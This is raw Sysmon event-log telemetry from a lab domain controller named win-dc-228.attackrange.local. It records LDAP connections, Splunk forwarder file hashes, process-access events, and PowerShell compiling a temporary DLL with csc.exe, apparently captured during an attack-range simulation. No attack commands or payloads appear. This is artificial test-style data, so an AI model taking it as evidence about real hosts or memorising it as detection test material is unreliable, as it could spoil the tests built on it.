AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55119-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002200342Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:16.360{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55119-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002200341Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:16.355{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55118-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002200340Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:16.355{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55118-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 23542300x80000000000000002200339Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.802{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0306372A3A201E575426D4D5BCAF23D,SHA256=FE32E08E9206E7360FEC1114DE702A6EA3E964BD16F2574CBC061C8EF276D2EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200338Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.505{5ABCFE62-E64F-6040-D94D-00000000AD01}62482052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200337Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.380{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E64F-6040-D94D-00000000AD01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200336Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.380{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200335Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.380{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200334Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.380{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200333Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.380{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200332Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.380{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E64F-6040-D94D-00000000AD01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200331Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.380{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E64F-6040-D94D-00000000AD01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200330Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.381{5ABCFE62-E64F-6040-D94D-00000000AD01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200329Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.161{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DCCB44B0FE4ACA980A1C631ADBD4F67,SHA256=6B2F22366B256A4EB1572BF683C371DBBA7A7F54353B1AEFD4F555F9FCA68755,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200328Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:19.020{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5=25311AD62D1204138876BC3F13CB2F4B,SHA256=F273F281D4D2E79E364B30A874B6FB5A0B41C53357666578C0CD64FF2413479C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200344Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:20.177{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D2FF85C89C4BCDE3556B2D7A68928E8,SHA256=CCB348CDDB1CED980964F7A525379A25E7E33667F44897FD42FE3B4FB6B3B39E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200347Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.999{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55120-false10.0.1.12-8000- 23542300x80000000000000002200346Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:21.208{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0C0DD336C80DD9FAA9E660BB8E8EE4B,SHA256=8FCD8F5506E37718C63C9AC26F08167DE9BF4E8143B5FE97C74B5BCB8B28DC7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200345Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:21.192{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A09CF8C767C325E891A6BCF36682FD66,SHA256=A0CCDF0917B5C2AF27E17A52AC027855E2898749D98E9266423F4D339F7E8C26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200349Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:22.224{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC6034E1EF6E40F011145F790CA7E3A,SHA256=F57897E5393210069B9F3348282307ED8835BA063359A0208FB567310EAB1399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200348Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:22.192{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0B9C97F7D11FD5D67D0C47DDA0EF4D10,SHA256=DB90B92432750871BE679FD39410B9BA19A6064E3709EFA763404A52489BD2BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200350Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:23.224{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82627EBFF30BCB7CCC080F8987BCDB77,SHA256=60034E7B9C2A42C45F51EA732F4234AEE16E717AFF6280C93684A3677F459D79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200395Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.474{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.outMD5=58B4CFB450C8C2D992BA9DB39DA0BA9B,SHA256=404D49FF223D62461A9D88233B569DEF516CA53CA1C456248635F184117CAB8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200394Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.474{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.dllMD5=5AAD633101B2E3E50B612A8F88ED0B8F,SHA256=4F11BCCCA37602DEE2DEFC82A28DF1AF5D96B360A352878D0AAC4AEFAE034A4C,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000002200393Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.474{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.cmdlineMD5=A984C4051605D7CCF4CE8D473ECEADA9,SHA256=E5B90CA694DEEF4AC462FAF988C568C8AC02D8EBF337C7DDB2A022A5C7589C7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200392Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.474{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.0.csMD5=10E9ABF0FAE68083CD0F74B09AFF5337,SHA256=D5A895B2362348B06CF4EEC1C6C912F9BA19E882023309237AA479EDC6E9834E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200391Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.474{5ABCFE62-E654-6040-DC4D-00000000AD01}5188ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\CSC6CA485C5EABA4B968FA4F0424C3D7C6C.TMPMD5=B8CAB049DB0C9254B2C4CE0B483E48E4,SHA256=6FA80029CF7DBB0012039BD644265DF154CB44662D28B54D474D27C33D9B4E19,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200390Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localDLL2021-03-04 13:53:24.474{5ABCFE62-E654-6040-DC4D-00000000AD01}5188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.dll2021-03-04 13:53:24.349 23542300x80000000000000002200389Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.474{5ABCFE62-E654-6040-DC4D-00000000AD01}5188ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200388Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.474{5ABCFE62-E654-6040-DC4D-00000000AD01}5188ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RES8B80.tmpMD5=DB3202EA66C06716CA5B1C1632E5FF94,SHA256=FA5C376E991CA3F663CC9AB3C170F97ADFDBB50524F0490DA2AA6F3AEF73472B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200387Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.474{5ABCFE62-E654-6040-DD4D-00000000AD01}5212ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RES8B80.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200386Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.458{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E654-6040-DD4D-00000000AD01}5212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200385Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.442{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200384Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.442{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200383Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.442{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200382Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.442{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200381Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.442{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-E654-6040-DD4D-00000000AD01}5212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200380Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.442{5ABCFE62-E654-6040-DC4D-00000000AD01}5188980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{5ABCFE62-E654-6040-DD4D-00000000AD01}5212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200379Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.446{5ABCFE62-E654-6040-DD4D-00000000AD01}5212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe 